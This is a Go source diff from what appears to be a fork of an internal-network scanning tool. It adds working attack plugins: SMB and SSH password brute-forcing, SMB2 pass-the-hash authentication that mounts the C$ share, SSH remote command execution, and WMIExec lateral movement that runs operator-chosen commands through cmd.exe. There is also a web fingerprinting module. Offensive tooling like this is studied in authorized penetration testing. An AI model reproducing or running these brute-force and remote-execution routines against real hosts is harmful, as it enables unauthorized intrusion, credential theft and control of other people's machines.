fmt.Println(fmt.Sprintf("已完成 %v/%v", common.End, common.Num))
|
||||
}
|
||||
|
||||
func AddScan(scantype string, info common.HostInfo, ch chan struct{}, wg *sync.WaitGroup) {
|
||||
var Mutex = &sync.Mutex{}
|
||||
|
||||
func AddScan(scantype string, info common.HostInfo, ch *chan struct{}, wg *sync.WaitGroup) {
|
||||
*ch <- struct{}{}
|
||||
wg.Add(1)
|
||||
go func() {
|
||||
err, _ := ScanFunc(PluginList, scantype, &info)
|
||||
if common.LogErr {
|
||||
tmperr := err[0].Interface()
|
||||
if tmperr != nil {
|
||||
tmperr1 := err[0].Interface().(error)
|
||||
errtext := strings.Replace(tmperr1.Error(), "\n", "", -1)
|
||||
fmt.Println("[-] ", info.Host+":"+info.Ports, errtext)
|
||||
}
|
||||
}
|
||||
Mutex.Lock()
|
||||
common.Num += 1
|
||||
Mutex.Unlock()
|
||||
ScanFunc(&scantype, &info)
|
||||
Mutex.Lock()
|
||||
common.End += 1
|
||||
Mutex.Unlock()
|
||||
wg.Done()
|
||||
<-ch
|
||||
<-*ch
|
||||
}()
|
||||
ch <- struct{}{}
|
||||
}
|
||||
|
||||
func ScanFunc(m map[string]interface{}, name string, infos ...interface{}) (result []reflect.Value, err error) {
|
||||
f := reflect.ValueOf(m[name])
|
||||
if len(infos) != f.Type().NumIn() {
|
||||
err = errors.New("The number of infos is not adapted ")
|
||||
fmt.Println(err.Error())
|
||||
return result, nil
|
||||
}
|
||||
in := make([]reflect.Value, len(infos))
|
||||
for k, info := range infos {
|
||||
in[k] = reflect.ValueOf(info)
|
||||
}
|
||||
result = f.Call(in)
|
||||
return result, nil
|
||||
func ScanFunc(name *string, info *common.HostInfo) {
|
||||
f := reflect.ValueOf(PluginList[*name])
|
||||
in := []reflect.Value{reflect.ValueOf(info)}
|
||||
f.Call(in)
|
||||
}
|
||||
|
||||
func IsContain(items []string, item string) bool {
|
||||
|
|
|
@ -1,38 +1,50 @@
|
|||
package Plugins
|
||||
|
||||
import (
|
||||
"errors"
|
||||
"fmt"
|
||||
"github.com/shadow1ng/fscan/common"
|
||||
"example.com/fxscan/common"
|
||||
"github.com/stacktitan/smb/smb"
|
||||
"strings"
|
||||
"time"
|
||||
)
|
||||
|
||||
func SmbScan(info *common.HostInfo) (tmperr error) {
|
||||
if common.IsBrute {
|
||||
return nil
|
||||
}
|
||||
starttime := time.Now().Unix()
|
||||
for _, user := range common.Userdict["smb"] {
|
||||
for _, pass := range common.Passwords {
|
||||
pass = strings.Replace(pass, "{user}", user, -1)
|
||||
flag, err := doWithTimeOut(info, user, pass)
|
||||
if flag == true && err == nil {
|
||||
var result string
|
||||
if info.Domain != "" {
|
||||
result = fmt.Sprintf("SMB:%v:%v:%v\\%v %v", info.Host, info.Ports, info.Domain, user, pass)
|
||||
if common.Domain != "" {
|
||||
result = fmt.Sprintf("[+] SMB:%v:%v:%v\\%v %v", info.Host, info.Ports, common.Domain, user, pass)
|
||||
} else {
|
||||
result = fmt.Sprintf("SMB:%v:%v:%v %v", info.Host, info.Ports, user, pass)
|
||||
result = fmt.Sprintf("[+] SMB:%v:%v:%v %v", info.Host, info.Ports, user, pass)
|
||||
}
|
||||
common.LogSuccess(result)
|
||||
return err
|
||||
} else {
|
||||
errlog := fmt.Sprintf("[-] smb %v %v %v %v %v", info.Host, 445, user, pass, err)
|
||||
errlog := fmt.Sprintf("[-] smb %v:%v %v %v %v", info.Host, 445, user, pass, err)
|
||||
errlog = strings.Replace(errlog, "\n", "", -1)
|
||||
common.LogError(errlog)
|
||||
tmperr = err
|
||||
if common.CheckErrs(err) {
|
||||
return err
|
||||
}
|
||||
if time.Now().Unix()-starttime > (int64(len(common.Userdict["smb"])*len(common.Passwords)) * common.Timeout) {
|
||||
return err
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
return tmperr
|
||||
}
|
||||
|
||||
func SmblConn(info *common.HostInfo, user string, pass string, Domain string, signal chan struct{}) (flag bool, err error) {
|
||||
func SmblConn(info *common.HostInfo, user string, pass string, signal chan struct{}) (flag bool, err error) {
|
||||
flag = false
|
||||
Host, Username, Password := info.Host, user, pass
|
||||
options := smb.Options{
|
||||
|
@ -40,7 +52,7 @@ func SmblConn(info *common.HostInfo, user string, pass string, Domain string, si
|
|||
Port: 445,
|
||||
User: Username,
|
||||
Password: Password,
|
||||
Domain: Domain,
|
||||
Domain: common.Domain,
|
||||
Workstation: "",
|
||||
}
|
||||
|
||||
|
@ -58,12 +70,12 @@ func SmblConn(info *common.HostInfo, user string, pass string, Domain string, si
|
|||
func doWithTimeOut(info *common.HostInfo, user string, pass string) (flag bool, err error) {
|
||||
signal := make(chan struct{})
|
||||
go func() {
|
||||
flag, err = SmblConn(info, user, pass, info.Domain, signal)
|
||||
flag, err = SmblConn(info, user, pass, signal)
|
||||
}()
|
||||
select {
|
||||
case <-signal:
|
||||
return flag, err
|
||||
case <-time.After(time.Duration(info.Timeout) * time.Second):
|
||||
return false, err
|
||||
case <-time.After(time.Duration(common.Timeout) * time.Second):
|
||||
return false, errors.New("time out")
|
||||
}
|
||||
}
|
||||
|
|
|
@ -0,0 +1,176 @@
|
|||
package Plugins
|
||||
|
||||
import (
|
||||
"fmt"
|
||||
"example.com/fxscan/common"
|
||||
"net"
|
||||
"os"
|
||||
"strings"
|
||||
"time"
|
||||
|
||||
"github.com/hirochachacha/go-smb2"
|
||||
)
|
||||
|
||||
func SmbScan2(info *common.HostInfo) (tmperr error) {
|
||||
if common.IsBrute {
|
||||
return nil
|
||||
}
|
||||
hasprint := false
|
||||
starttime := time.Now().Unix()
|
||||
hash := common.HashBytes
|
||||
for _, user := range common.Userdict["smb"] {
|
||||
PASS:
|
||||
for _, pass := range common.Passwords {
|
||||
pass = strings.Replace(pass, "{user}", user, -1)
|
||||
flag, err, flag2 := Smb2Con(info, user, pass, hash, hasprint)
|
||||
if flag2 {
|
||||
hasprint = true
|
||||
}
|
||||
if flag == true {
|
||||
var result string
|
||||
if common.Domain != "" {
|
||||
result = fmt.Sprintf("[+] SMB2:%v:%v:%v\\%v ", info.Host, info.Ports, common.Domain, user)
|
||||
} else {
|
||||
result = fmt.Sprintf("[+] SMB2:%v:%v:%v ", info.Host, info.Ports, user)
|
||||
}
|
||||
if len(hash) > 0 {
|
||||
result += "hash: " + common.Hash
|
||||
} else {
|
||||
result += pass
|
||||
}
|
||||
common.LogSuccess(result)
|
||||
return err
|
||||
} else {
|
||||
var errlog string
|
||||
if len(common.Hash) > 0 {
|
||||
errlog = fmt.Sprintf("[-] smb2 %v:%v %v %v %v", info.Host, 445, user, common.Hash, err)
|
||||
} else {
|
||||
errlog = fmt.Sprintf("[-] smb2 %v:%v %v %v %v", info.Host, 445, user, pass, err)
|
||||
}
|
||||
errlog = strings.Replace(errlog, "\n", " ", -1)
|
||||
common.LogError(errlog)
|
||||
tmperr = err
|
||||
if common.CheckErrs(err) {
|
||||
return err
|
||||
}
|
||||
if time.Now().Unix()-starttime > (int64(len(common.Userdict["smb"])*len(common.Passwords)) * common.Timeout) {
|
||||
return err
|
||||
}
|
||||
}
|
||||
if len(common.Hash) > 0 {
|
||||
break PASS
|
||||
}
|
||||
}
|
||||
}
|
||||
return tmperr
|
||||
}
|
||||
|
||||
func Smb2Con(info *common.HostInfo, user string, pass string, hash []byte, hasprint bool) (flag bool, err error, flag2 bool) {
|
||||
conn, err := net.DialTimeout("tcp", info.Host+":445", time.Duration(common.Timeout)*time.Second)
|
||||
defer func() {
|
||||
if conn != nil {
|
||||
conn.Close()
|
||||
}
|
||||
}()
|
||||
if err != nil {
|
||||
return
|
||||
}
|
||||
initiator := smb2.NTLMInitiator{
|
||||
User: user,
|
||||
Domain: common.Domain,
|
||||
}
|
||||
if len(hash) > 0 {
|
||||
initiator.Hash = hash
|
||||
} else {
|
||||
initiator.Password = pass
|
||||
}
|
||||
d := &smb2.Dialer{
|
||||
Initiator: &initiator,
|
||||
}
|
||||
|
||||
s, err := d.Dial(conn)
|
||||
if err != nil {
|
||||
return
|
||||
}
|
||||
defer s.Logoff()
|
||||
names, err := s.ListSharenames()
|
||||
if err != nil {
|
||||
return
|
||||
}
|
||||
if !hasprint {
|
||||
var result string
|
||||
if common.Domain != "" {
|
||||
result = fmt.Sprintf("[*] SMB2-shares:%v:%v:%v\\%v ", info.Host, info.Ports, common.Domain, user)
|
||||
} else {
|
||||
result = fmt.Sprintf("[*] SMB2-shares:%v:%v:%v ", info.Host, info.Ports, user)
|
||||
}
|
||||
if len(hash) > 0 {
|
||||
result += "hash: " + common.Hash
|
||||
} else {
|
||||
result += pass
|
||||
}
|
||||
result = fmt.Sprintf("%v shares: %v", result, names)
|
||||
common.LogSuccess(result)
|
||||
flag2 = true
|
||||
}
|
||||
fs, err := s.Mount("C$")
|
||||
if err != nil {
|
||||
return
|
||||
}
|
||||
defer fs.Umount()
|
||||
path := `Windows\win.ini`
|
||||
f, err := fs.OpenFile(path, os.O_RDONLY, 0666)
|
||||
if err != nil {
|
||||
return
|
||||
}
|
||||
defer f.Close()
|
||||
flag = true
|
||||
return
|
||||
//bs, err := ioutil.ReadAll(f)
|
||||
//if err != nil {
|
||||
// return
|
||||
//}
|
||||
//fmt.Println(string(bs))
|
||||
//return
|
||||
|
||||
}
|
||||
|
||||
//if info.Path == ""{
|
||||
//}
|
||||
//path = info.Path
|
||||
//f, err := fs.OpenFile(path, os.O_RDONLY, 0666)
|
||||
//if err != nil {
|
||||
// return
|
||||
//}
|
||||
//flag = true
|
||||
//_, err = f.Seek(0, io.SeekStart)
|
||||
//if err != nil {
|
||||
// return
|
||||
//}
|
||||
//bs, err := ioutil.ReadAll(f)
|
||||
//if err != nil {
|
||||
// return
|
||||
//}
|
||||
//fmt.Println(string(bs))
|
||||
//return
|
||||
//f, err := fs.Create(`Users\Public\Videos\hello.txt`)
|
||||
//if err != nil {
|
||||
// return
|
||||
//}
|
||||
//flag = true
|
||||
//
|
||||
//_, err = f.Write([]byte("Hello world!"))
|
||||
//if err != nil {
|
||||
// return
|
||||
//}
|
||||
//
|
||||
//_, err = f.Seek(0, io.SeekStart)
|
||||
//if err != nil {
|
||||
// return
|
||||
//}
|
||||
//bs, err := ioutil.ReadAll(f)
|
||||
//if err != nil {
|
||||
// return
|
||||
//}
|
||||
//fmt.Println(string(bs))
|
||||
//return
|
|
@ -1,15 +1,21 @@
|
|||
package Plugins
|
||||
|
||||
import (
|
||||
"errors"
|
||||
"fmt"
|
||||
"github.com/shadow1ng/fscan/common"
|
||||
"example.com/fxscan/common"
|
||||
"golang.org/x/crypto/ssh"
|
||||
"io/ioutil"
|
||||
"net"
|
||||
"strings"
|
||||
"time"
|
||||
)
|
||||
|
||||
func SshScan(info *common.HostInfo) (tmperr error) {
|
||||
if common.IsBrute {
|
||||
return
|
||||
}
|
||||
starttime := time.Now().Unix()
|
||||
for _, user := range common.Userdict["ssh"] {
|
||||
for _, pass := range common.Passwords {
|
||||
pass = strings.Replace(pass, "{user}", user, -1)
|
||||
|
@ -17,9 +23,18 @@ func SshScan(info *common.HostInfo) (tmperr error) {
|
|||
if flag == true && err == nil {
|
||||
return err
|
||||
} else {
|
||||
errlog := fmt.Sprintf("[-] ssh", info.Host, common.PORTList["ssh"], user, pass, err)
|
||||
errlog := fmt.Sprintf("[-] ssh %v:%v %v %v %v", info.Host, info.Ports, user, pass, err)
|
||||
common.LogError(errlog)
|
||||
tmperr = err
|
||||
if common.CheckErrs(err) {
|
||||
return err
|
||||
}
|
||||
if time.Now().Unix()-starttime > (int64(len(common.Userdict["ssh"])*len(common.Passwords)) * common.Timeout) {
|
||||
return err
|
||||
}
|
||||
}
|
||||
if common.SshKey != "" {
|
||||
return err
|
||||
}
|
||||
}
|
||||
}
|
||||
|
@ -28,13 +43,26 @@ func SshScan(info *common.HostInfo) (tmperr error) {
|
|||
|
||||
func SshConn(info *common.HostInfo, user string, pass string) (flag bool, err error) {
|
||||
flag = false
|
||||
Host, Port, Username, Password := info.Host, common.PORTList["ssh"], user, pass
|
||||
Host, Port, Username, Password := info.Host, info.Ports, user, pass
|
||||
Auth := []ssh.AuthMethod{}
|
||||
if common.SshKey != "" {
|
||||
pemBytes, err := ioutil.ReadFile(common.SshKey)
|
||||
if err != nil {
|
||||
return false, errors.New("read key failed" + err.Error())
|
||||
}
|
||||
signer, err := ssh.ParsePrivateKey(pemBytes)
|
||||
if err != nil {
|
||||
return false, errors.New("parse key failed" + err.Error())
|
||||
}
|
||||
Auth = []ssh.AuthMethod{ssh.PublicKeys(signer)}
|
||||
} else {
|
||||
Auth = []ssh.AuthMethod{ssh.Password(Password)}
|
||||
}
|
||||
|
||||
config := &ssh.ClientConfig{
|
||||
User: Username,
|
||||
Auth: []ssh.AuthMethod{
|
||||
ssh.Password(Password),
|
||||
},
|
||||
Timeout: time.Duration(info.Timeout) * time.Second,
|
||||
User: Username,
|
||||
Auth: Auth,
|
||||
Timeout: time.Duration(common.Timeout) * time.Second,
|
||||
HostKeyCallback: func(hostname string, remote net.Addr, key ssh.PublicKey) error {
|
||||
return nil
|
||||
},
|
||||
|
@ -47,12 +75,19 @@ func SshConn(info *common.HostInfo, user string, pass string) (flag bool, err er
|
|||
if err == nil {
|
||||
defer session.Close()
|
||||
flag = true
|
||||
if info.Command != "" {
|
||||
combo, _ := session.CombinedOutput(info.Command)
|
||||
result := fmt.Sprintf("SSH:%v:%v:%v %v \n %v", Host, Port, Username, Password, string(combo))
|
||||
var result string
|
||||
if common.Command != "" {
|
||||
combo, _ := session.CombinedOutput(common.Command)
|
||||
result = fmt.Sprintf("[+] SSH:%v:%v:%v %v \n %v", Host, Port, Username, Password, string(combo))
|
||||
if common.SshKey != "" {
|
||||
result = fmt.Sprintf("[+] SSH:%v:%v sshkey correct \n %v", Host, Port, string(combo))
|
||||
}
|
||||
common.LogSuccess(result)
|
||||
} else {
|
||||
result := fmt.Sprintf("[+] SSH:%v:%v:%v %v", Host, Port, Username, Password)
|
||||
result = fmt.Sprintf("[+] SSH:%v:%v:%v %v", Host, Port, Username, Password)
|
||||
if common.SshKey != "" {
|
||||
result = fmt.Sprintf("[+] SSH:%v:%v sshkey correct", Host, Port)
|
||||
}
|
||||
common.LogSuccess(result)
|
||||
}
|
||||
}
|
||||
|
|
|
@ -1,117 +1,250 @@
|
|||
package Plugins
|
||||
|
||||
import (
|
||||
"compress/gzip"
|
||||
"crypto/tls"
|
||||
"fmt"
|
||||
"github.com/shadow1ng/fscan/WebScan"
|
||||
"github.com/shadow1ng/fscan/common"
|
||||
"io"
|
||||
"io/ioutil"
|
||||
"net"
|
||||
"net/http"
|
||||
"net/url"
|
||||
"regexp"
|
||||
"strings"
|
||||
"time"
|
||||
"unicode/utf8"
|
||||
|
||||
"example.com/fxscan/Web_Scan"
|
||||
"example.com/fxscan/Web_Scan/lib"
|
||||
"example.com/fxscan/common"
|
||||
"golang.org/x/text/encoding/simplifiedchinese"
|
||||
)
|
||||
|
||||
var CheckData []WebScan.CheckDatas
|
||||
|
||||
func WebTitle(info *common.HostInfo) error {
|
||||
if info.Ports == "80" {
|
||||
info.Url = fmt.Sprintf("http://%s", info.Host)
|
||||
} else if info.Ports == "443" {
|
||||
info.Url = fmt.Sprintf("https://%s", info.Host)
|
||||
if common.Scantype == "webpoc" {
|
||||
Web_Scan.Web_Scan(info)
|
||||
return nil
|
||||
}
|
||||
err, CheckData := GOWebTitle(info)
|
||||
info.Infostr = Web_Scan.InfoCheck(info.Url, &CheckData)
|
||||
|
||||
if common.IsWebCan == false && err == nil {
|
||||
Web_Scan.Web_Scan(info)
|
||||
} else {
|
||||
info.Url = fmt.Sprintf("http://%s:%s", info.Host, info.Ports)
|
||||
errlog := fmt.Sprintf("[-] webtitle %v %v", info.Url, err)
|
||||
common.LogError(errlog)
|
||||
}
|
||||
|
||||
err, result := geturl(info, true)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
if result == "https" {
|
||||
err, _ := geturl(info, true)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
}
|
||||
|
||||
err, _ = geturl(info, false)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
|
||||
WebScan.InfoCheck(info.Url, CheckData)
|
||||
|
||||
if common.IsWebCan == false {
|
||||
WebScan.WebScan(info)
|
||||
}
|
||||
|
||||
return err
|
||||
}
|
||||
|
||||
func geturl(info *common.HostInfo, flag bool) (err error, result string) {
|
||||
Url := info.Url
|
||||
if flag == false {
|
||||
Url += "/favicon.ico"
|
||||
}
|
||||
tr := &http.Transport{
|
||||
TLSClientConfig: &tls.Config{InsecureSkipVerify: true},
|
||||
DisableKeepAlives: false,
|
||||
DialContext: (&net.Dialer{
|
||||
Timeout: time.Duration(info.WebTimeout) * time.Second,
|
||||
KeepAlive: time.Duration(info.WebTimeout+3) * time.Second,
|
||||
}).DialContext,
|
||||
MaxIdleConns: 1000,
|
||||
MaxIdleConnsPerHost: 1000,
|
||||
IdleConnTimeout: time.Duration(info.WebTimeout+3) * time.Second,
|
||||
TLSHandshakeTimeout: 5 * time.Second,
|
||||
}
|
||||
//u, err := url.Parse("http://127.0.0.1:8080")
|
||||
//if err != nil {
|
||||
// return err,result
|
||||
//}
|
||||
//tr.Proxy = http.ProxyURL(u)
|
||||
|
||||
var client = &http.Client{Timeout: time.Duration(info.WebTimeout) * time.Second, Transport: tr}
|
||||
res, err := http.NewRequest("GET", Url, nil)
|
||||
if err == nil {
|
||||
res.Header.Add("User-agent", "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36")
|
||||
res.Header.Add("Accept", "*/*")
|
||||
res.Header.Add("Accept-Language", "zh-CN,zh;q=0.9")
|
||||
res.Header.Add("Accept-Encoding", "gzip, deflate")
|
||||
if flag == true {
|
||||
res.Header.Add("Cookie", "rememberMe=1")
|
||||
func GOWebTitle(info *common.HostInfo) (err error, CheckData []Web_Scan.CheckDatas) {
|
||||
if info.Url == "" {
|
||||
switch info.Ports {
|
||||
case "80":
|
||||
info.Url = fmt.Sprintf("http://%s", info.Host)
|
||||
case "443":
|
||||
info.Url = fmt.Sprintf("https://%s", info.Host)
|
||||
default:
|
||||
host := fmt.Sprintf("%s:%s", info.Host, info.Ports)
|
||||
protocol := GetProtocol(host, common.Timeout)
|
||||
info.Url = fmt.Sprintf("%s://%s:%s", protocol, info.Host, info.Ports)
|
||||
}
|
||||
res.Header.Add("Connection", "close")
|
||||
resp, err := client.Do(res)
|
||||
if err == nil {
|
||||
defer resp.Body.Close()
|
||||
var title string
|
||||
body, _ := ioutil.ReadAll(resp.Body)
|
||||
re := regexp.MustCompile("<title>(.*)</title>")
|
||||
find := re.FindAllStringSubmatch(string(body), -1)
|
||||
if len(find) > 0 {
|
||||
title = find[0][1]
|
||||
if len(title) > 100 {
|
||||
title = title[:100]
|
||||
}
|
||||
} else {
|
||||
title = "None"
|
||||
}
|
||||
if flag == true {
|
||||
result = fmt.Sprintf("WebTitle:%-25v %-3v %v", Url, resp.StatusCode, title)
|
||||
common.LogSuccess(result)
|
||||
}
|
||||
|
||||
CheckData = append(CheckData, WebScan.CheckDatas{body, fmt.Sprintf("%s", resp.Header)})
|
||||
|
||||
if resp.StatusCode == 400 && info.Url[:5] != "https" {
|
||||
info.Url = strings.Replace(info.Url, "http://", "https://", 1)
|
||||
return err, "https"
|
||||
}
|
||||
return err, result
|
||||
} else {
|
||||
if !strings.Contains(info.Url, "://") {
|
||||
host := strings.Split(info.Url, "/")[0]
|
||||
protocol := GetProtocol(host, common.Timeout)
|
||||
info.Url = fmt.Sprintf("%s://%s", protocol, info.Url)
|
||||
}
|
||||
return err, ""
|
||||
}
|
||||
return err, ""
|
||||
|
||||
err, result, CheckData := geturl(info, 1, CheckData)
|
||||
if err != nil && !strings.Contains(err.Error(), "EOF") {
|
||||
return
|
||||
}
|
||||
|
||||
//有跳转
|
||||
if strings.Contains(result, "://") {
|
||||
info.Url = result
|
||||
err, result, CheckData = geturl(info, 3, CheckData)
|
||||
if err != nil {
|
||||
return
|
||||
}
|
||||
}
|
||||
|
||||
if result == "https" && !strings.HasPrefix(info.Url, "https://") {
|
||||
info.Url = strings.Replace(info.Url, "http://", "https://", 1)
|
||||
err, result, CheckData = geturl(info, 1, CheckData)
|
||||
//有跳转
|
||||
if strings.Contains(result, "://") {
|
||||
info.Url = result
|
||||
err, result, CheckData = geturl(info, 3, CheckData)
|
||||
if err != nil {
|
||||
return
|
||||
}
|
||||
}
|
||||
}
|
||||
//是否访问图标
|
||||
//err, _, CheckData = geturl(info, 2, CheckData)
|
||||
if err != nil {
|
||||
return
|
||||
}
|
||||
return
|
||||
}
|
||||
|
||||
func geturl(info *common.HostInfo, flag int, CheckData []Web_Scan.CheckDatas) (error, string, []Web_Scan.CheckDatas) {
|
||||
//flag 1 first try
|
||||
//flag 2 /favicon.ico
|
||||
//flag 3 302
|
||||
//flag 4 400 -> https
|
||||
|
||||
Url := info.Url
|
||||
if flag == 2 {
|
||||
URL, err := url.Parse(Url)
|
||||
if err == nil {
|
||||
Url = fmt.Sprintf("%s://%s/favicon.ico", URL.Scheme, URL.Host)
|
||||
} else {
|
||||
Url += "/favicon.ico"
|
||||
}
|
||||
}
|
||||
req, err := http.NewRequest("GET", Url, nil)
|
||||
if err != nil {
|
||||
return err, "", CheckData
|
||||
}
|
||||
req.Header.Set("User-agent", common.UserAgent)
|
||||
req.Header.Set("Accept", common.Accept)
|
||||
req.Header.Set("Accept-Language", "zh-CN,zh;q=0.9")
|
||||
if common.Cookie != "" {
|
||||
req.Header.Set("Cookie", common.Cookie)
|
||||
}
|
||||
//if common.Pocinfo.Cookie != "" {
|
||||
// req.Header.Set("Cookie", "rememberMe=1;"+common.Pocinfo.Cookie)
|
||||
//} else {
|
||||
// req.Header.Set("Cookie", "rememberMe=1")
|
||||
//}
|
||||
req.Header.Set("Connection", "close")
|
||||
var client *http.Client
|
||||
if flag == 1 {
|
||||
client = lib.ClientNoRedirect
|
||||
} else {
|
||||
client = lib.Client
|
||||
}
|
||||
|
||||
resp, err := client.Do(req)
|
||||
if err != nil {
|
||||
return err, "https", CheckData
|
||||
}
|
||||
|
||||
defer resp.Body.Close()
|
||||
var title string
|
||||
body, err := getRespBody(resp)
|
||||
if err != nil {
|
||||
return err, "https", CheckData
|
||||
}
|
||||
if !utf8.Valid(body) {
|
||||
body, _ = simplifiedchinese.GBK.NewDecoder().Bytes(body)
|
||||
}
|
||||
CheckData = append(CheckData, Web_Scan.CheckDatas{Body: body, Headers: fmt.Sprintf("%s", resp.Header)})
|
||||
var reurl string
|
||||
if flag != 2 {
|
||||
title = gettitle(body)
|
||||
length := resp.Header.Get("Content-Length")
|
||||
if length == "" {
|
||||
length = fmt.Sprintf("%v", len(body))
|
||||
}
|
||||
redirURL, err1 := resp.Location()
|
||||
if err1 == nil {
|
||||
reurl = redirURL.String()
|
||||
}
|
||||
result := fmt.Sprintf("[*] WebTitle: %-25v code:%-3v len:%-6v title:%v", resp.Request.URL, resp.StatusCode, length, title)
|
||||
if reurl != "" {
|
||||
result += fmt.Sprintf(" 跳转url: %s", reurl)
|
||||
}
|
||||
common.LogSuccess(result)
|
||||
}
|
||||
if reurl != "" {
|
||||
return nil, reurl, CheckData
|
||||
}
|
||||
if resp.StatusCode == 400 && !strings.HasPrefix(info.Url, "https") {
|
||||
return nil, "https", CheckData
|
||||
}
|
||||
return nil, "", CheckData
|
||||
}
|
||||
|
||||
func getRespBody(oResp *http.Response) ([]byte, error) {
|
||||
var body []byte
|
||||
if oResp.Header.Get("Content-Encoding") == "gzip" {
|
||||
gr, err := gzip.NewReader(oResp.Body)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
defer gr.Close()
|
||||
for {
|
||||
buf := make([]byte, 1024)
|
||||
n, err := gr.Read(buf)
|
||||
if err != nil && err != io.EOF {
|
||||
return nil, err
|
||||
}
|
||||
if n == 0 {
|
||||
break
|
||||
}
|
||||
body = append(body, buf...)
|
||||
}
|
||||
} else {
|
||||
raw, err := ioutil.ReadAll(oResp.Body)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
body = raw
|
||||
}
|
||||
return body, nil
|
||||
}
|
||||
|
||||
func gettitle(body []byte) (title string) {
|
||||
re := regexp.MustCompile("(?ims)<title>(.*?)</title>")
|
||||
find := re.FindSubmatch(body)
|
||||
if len(find) > 1 {
|
||||
title = string(find[1])
|
||||
title = strings.TrimSpace(title)
|
||||
title = strings.Replace(title, "\n", "", -1)
|
||||
title = strings.Replace(title, "\r", "", -1)
|
||||
title = strings.Replace(title, " ", " ", -1)
|
||||
if len(title) > 100 {
|
||||
title = title[:100]
|
||||
}
|
||||
}
|
||||
if title == "" {
|
||||
title = "None"
|
||||
}
|
||||
return
|
||||
}
|
||||
|
||||
func GetProtocol(host string, Timeout int64) (protocol string) {
|
||||
protocol = "http"
|
||||
//如果端口是80或443,跳过Protocol判断
|
||||
if strings.HasSuffix(host, ":80") || !strings.Contains(host, ":") {
|
||||
return
|
||||
} else if strings.HasSuffix(host, ":443") {
|
||||
protocol = "https"
|
||||
return
|
||||
}
|
||||
|
||||
socksconn, err := common.WrapperTcpWithTimeout("tcp", host, time.Duration(Timeout)*time.Second)
|
||||
if err != nil {
|
||||
return
|
||||
}
|
||||
conn := tls.Client(socksconn, &tls.Config{InsecureSkipVerify: true})
|
||||
defer func() {
|
||||
if conn != nil {
|
||||
defer func() {
|
||||
if err := recover(); err != nil {
|
||||
common.LogError(err)
|
||||
}
|
||||
}()
|
||||
conn.Close()
|
||||
}
|
||||
}()
|
||||
conn.SetDeadline(time.Now().Add(time.Duration(Timeout) * time.Second))
|
||||
err = conn.Handshake()
|
||||
if err == nil || strings.Contains(err.Error(), "handshake failure") {
|
||||
protocol = "https"
|
||||
}
|
||||
return protocol
|
||||
}
|
||||
|
|
|
@ -0,0 +1,117 @@
|
|||
package Plugins
|
||||
|
||||
import (
|
||||
"errors"
|
||||
"fmt"
|
||||
"example.com/fxscan/common"
|
||||
"os"
|
||||
"strings"
|
||||
"time"
|
||||
|
||||
"github.com/C-Sto/goWMIExec/pkg/wmiexec"
|
||||
)
|
||||
|
||||
var ClientHost string
|
||||
var flag bool
|
||||
|
||||
func init() {
|
||||
if flag {
|
||||
return
|
||||
}
|
||||
clientHost, err := os.Hostname()
|
||||
if err != nil {
|
||||
fmt.Println(err)
|
||||
}
|
||||
ClientHost = clientHost
|
||||
flag = true
|
||||
}
|
||||
|
||||
func WmiExec(info *common.HostInfo) (tmperr error) {
|
||||
if common.IsBrute {
|
||||
return nil
|
||||
}
|
||||
starttime := time.Now().Unix()
|
||||
for _, user := range common.Userdict["smb"] {
|
||||
PASS:
|
||||
for _, pass := range common.Passwords {
|
||||
pass = strings.Replace(pass, "{user}", user, -1)
|
||||
flag, err := Wmiexec(info, user, pass, common.Hash)
|
||||
errlog := fmt.Sprintf("[-] WmiExec %v:%v %v %v %v", info.Host, 445, user, pass, err)
|
||||
errlog = strings.Replace(errlog, "\n", "", -1)
|
||||
common.LogError(errlog)
|
||||
if flag == true {
|
||||
var result string
|
||||
if common.Domain != "" {
|
||||
result = fmt.Sprintf("[+] WmiExec:%v:%v:%v\\%v ", info.Host, info.Ports, common.Domain, user)
|
||||
} else {
|
||||
result = fmt.Sprintf("[+] WmiExec:%v:%v:%v ", info.Host, info.Ports, user)
|
||||
}
|
||||
if common.Hash != "" {
|
||||
result += "hash: " + common.Hash
|
||||
} else {
|
||||
result += pass
|
||||
}
|
||||
common.LogSuccess(result)
|
||||
return err
|
||||
} else {
|
||||
tmperr = err
|
||||
if common.CheckErrs(err) {
|
||||
return err
|
||||
}
|
||||
if time.Now().Unix()-starttime > (int64(len(common.Userdict["smb"])*len(common.Passwords)) * common.Timeout) {
|
||||
return err
|
||||
}
|
||||
}
|
||||
if len(common.Hash) == 32 {
|
||||
break PASS
|
||||
}
|
||||
}
|
||||
}
|
||||
return tmperr
|
||||
}
|
||||
|
||||
func Wmiexec(info *common.HostInfo, user string, pass string, hash string) (flag bool, err error) {
|
||||
target := fmt.Sprintf("%s:%v", info.Host, info.Ports)
|
||||
wmiexec.Timeout = int(common.Timeout)
|
||||
return WMIExec(target, user, pass, hash, common.Domain, common.Command, ClientHost, "", nil)
|
||||
}
|
||||
|
||||
func WMIExec(target, username, password, hash, domain, command, clientHostname, binding string, cfgIn *wmiexec.WmiExecConfig) (flag bool, err error) {
|
||||
if cfgIn == nil {
|
||||
cfg, err1 := wmiexec.NewExecConfig(username, password, hash, domain, target, clientHostname, true, nil, nil)
|
||||
if err1 != nil {
|
||||
err = err1
|
||||
return
|
||||
}
|
||||
cfgIn = &cfg
|
||||
}
|
||||
execer := wmiexec.NewExecer(cfgIn)
|
||||
err = execer.SetTargetBinding(binding)
|
||||
if err != nil {
|
||||
return
|
||||
}
|
||||
|
||||
err = execer.Auth()
|
||||
if err != nil {
|
||||
return
|
||||
}
|
||||
flag = true
|
||||
|
||||
if command != "" {
|
||||
command = "C:\\Windows\\system32\\cmd.exe /c " + command
|
||||
if execer.TargetRPCPort == 0 {
|
||||
err = errors.New("RPC Port is 0, cannot connect")
|
||||
return
|
||||
}
|
||||
|
||||
err = execer.RPCConnect()
|
||||
if err != nil {
|
||||
return
|
||||
}
|
||||
err = execer.Exec(command)
|
||||
if err != nil {
|
||||
return
|
||||
}
|
||||
}
|
||||
return
|
||||
}
|
254
README.md
254
README.md
|
@ -1,109 +1,163 @@
|
|||
# fscan
|
||||
[English][url-docen]
|
||||
|
||||
# 简介
|
||||
一款内网扫描工具,方便一键大保健。
|
||||
